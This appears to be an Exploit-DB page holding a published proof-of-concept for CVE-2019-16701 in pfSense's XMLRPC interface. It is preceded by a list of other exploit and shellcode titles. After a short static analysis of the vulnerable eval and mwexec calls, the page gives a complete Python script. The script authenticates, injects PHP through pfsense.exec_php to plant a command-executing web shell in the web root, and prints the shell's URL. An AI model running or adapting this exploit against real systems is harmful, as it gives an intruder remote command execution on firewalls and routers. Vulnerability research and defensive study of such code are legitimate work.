
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
167 lines
No EOL
4.5 KiB
Python
Executable file
167 lines
No EOL
4.5 KiB
Python
Executable file
# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
|
|
# Date: 23/09/2018
|
|
# Author: Nassim Asrir
|
|
# Vendor Homepage: https://www.pfsense.org/
|
|
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
|
# CVE: CVE-2019-16701
|
|
# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3
|
|
######################################################################################################
|
|
|
|
1 : About Pfsense:
|
|
==================
|
|
|
|
pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.
|
|
|
|
2 : Technical Analysis:
|
|
=======================
|
|
|
|
The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.
|
|
|
|
XMLRPC methods:
|
|
|
|
pfsense.exec_shell
|
|
pfsense.exec_php
|
|
pfsense.filter_configure
|
|
pfsense.interfaces_carp_configure
|
|
pfsense.backup_config_section
|
|
pfsense.restore_config_section
|
|
pfsense.merge_config_section
|
|
pfsense.merge_installedpackages_section_xmlrpc
|
|
pfsense.host_firmware_version
|
|
pfsense.reboot
|
|
pfsense.get_notices
|
|
system.listMethods
|
|
system.methodHelp
|
|
system.methodSignature
|
|
|
|
As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.
|
|
|
|
2 : Static Analysis:
|
|
====================
|
|
|
|
In the static analysis we will analysis the xmlrpc.php file.
|
|
|
|
Line (73 - 82)
|
|
|
|
This code check if the user have enough privileges.
|
|
|
|
$user_entry = getUserEntry($username);
|
|
/*
|
|
* admin (uid = 0) is allowed
|
|
* or regular user with necessary privilege
|
|
*/
|
|
if (isset($user_entry['uid']) && $user_entry['uid'] != '0' &&
|
|
!userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {
|
|
log_auth("webConfigurator authentication error for '" .
|
|
$username . "' from " . $this->remote_addr .
|
|
" not enough privileges");
|
|
|
|
|
|
Line (137 - 146)
|
|
|
|
This part of code is the interest for us.
|
|
|
|
As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).
|
|
|
|
public function exec_php($code) {
|
|
$this->auth();
|
|
|
|
eval($code);
|
|
if ($toreturn) {
|
|
return $toreturn;
|
|
}
|
|
|
|
return true;
|
|
}
|
|
|
|
Line (155 - 160)
|
|
|
|
In this part of code also we have a check for auth then the execution for ($code)
|
|
|
|
public function exec_shell($code) {
|
|
$this->auth();
|
|
|
|
mwexec($code);
|
|
return true;
|
|
}
|
|
|
|
3 - Exploit:
|
|
============
|
|
|
|
#!/usr/bin/env python
|
|
|
|
import argparse
|
|
import requests
|
|
import urllib2
|
|
import time
|
|
import sys
|
|
import string
|
|
import random
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1")
|
|
parser.add_argument("--password", help = "pfsense Password")
|
|
args = parser.parse_args()
|
|
|
|
rhost = args.rhost
|
|
password = args.password
|
|
print ""
|
|
|
|
print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection"
|
|
print ""
|
|
print "[+] Author: Nassim Asrir"
|
|
print ""
|
|
|
|
command = "<?xml version='1.0' encoding='iso-8859-1'?>"
|
|
command += "<methodCall>"
|
|
command += "<methodName>pfsense.host_firmware_version</methodName>"
|
|
command += "<params>"
|
|
command += "<param><value><string>"+password+"</string></value></param>"
|
|
command += "</params>"
|
|
command += "</methodCall>"
|
|
|
|
stage1 = rhost + "/xmlrpc.php"
|
|
|
|
page = urllib2.urlopen(stage1, data=command).read()
|
|
|
|
print "[+] Checking Login Creds"
|
|
|
|
|
|
if "Authentication failed" in page:
|
|
|
|
print "[-] Wrong password :("
|
|
sys.exit(0)
|
|
else:
|
|
|
|
random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])
|
|
|
|
print "[+] logged in successfully :)"
|
|
print "[+] Generating random file "+random+".php"
|
|
print "[+] Sending the exploit ....."
|
|
|
|
|
|
command = "<?xml version='1.0' encoding='iso-8859-1'?>"
|
|
command += "<methodCall>"
|
|
command += "<methodName>pfsense.exec_php</methodName>"
|
|
command += "<params>"
|
|
command += "<param><value><string>"+password+"</string></value></param>"
|
|
command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\' > /usr/local/www/"+random+".php');</string></value></param>"
|
|
command += "</params>"
|
|
command += "</methodCall>"
|
|
|
|
stage1 = rhost + "/xmlrpc.php"
|
|
|
|
page = urllib2.urlopen(stage1, data=command).read()
|
|
|
|
final = rhost+"/"+str(random)+".php"
|
|
|
|
check = urllib2.urlopen(final)
|
|
|
|
print "[+] Checking ....."
|
|
|
|
if check.getcode() == 200:
|
|
|
|
print "[+] Yeah! You got your shell: " + final+"?cmd=id"
|
|
else:
|
|
|
|
print "[+] Sorry :( Shell not found check the path" |